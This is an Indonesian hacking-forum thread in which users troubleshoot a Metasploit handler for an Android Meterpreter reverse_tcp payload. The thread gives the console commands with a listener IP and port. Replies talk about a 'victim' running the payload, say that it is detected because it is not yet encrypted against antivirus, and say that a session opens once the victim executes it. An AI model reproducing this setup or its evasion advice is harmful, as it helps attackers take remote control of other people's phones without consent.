04-19-2014, 10:58 PM
(04-19-2014, 07:14 PM)eMJe009 Wrote:(04-19-2014, 06:28 PM)sonyrimawan Wrote:(04-19-2014, 02:00 AM)eMJe009 Wrote: msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 95.128.181.59
lhost => 95.128.181.59
msf exploit(handler) > set lport 123
lport => 123
msf exploit(handler) > exploit
[-] Handler failed to bind to 95.xxx.xxx.xx:123
[*] Started reverse handler on 0.0.0.0:123
[*] Starting the payload handler...
Kalo failed gitu gimana om ?
mohon pencerahannya
failednya notifikasinya bagaimana? coba ketahui dulu apakah korban menggunakan antivirus di androidnya. soalnya itu payload masih telanjang belum di enkripsi jadi di antivirus masih ketahuan.
failed pas jalanin exploitnya
[-] Handler failed to bind to 95.xxx.xxx.xx:123
emang gtu kok kalo ane om, tp klo udh di eksekusi sama korban langsung kebuka sesi meterpreter nya

ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret
visit: http://warungiso.blogspot.com/
I was not smart or special but I was unix
visit: http://warungiso.blogspot.com/
I was not smart or special but I was unix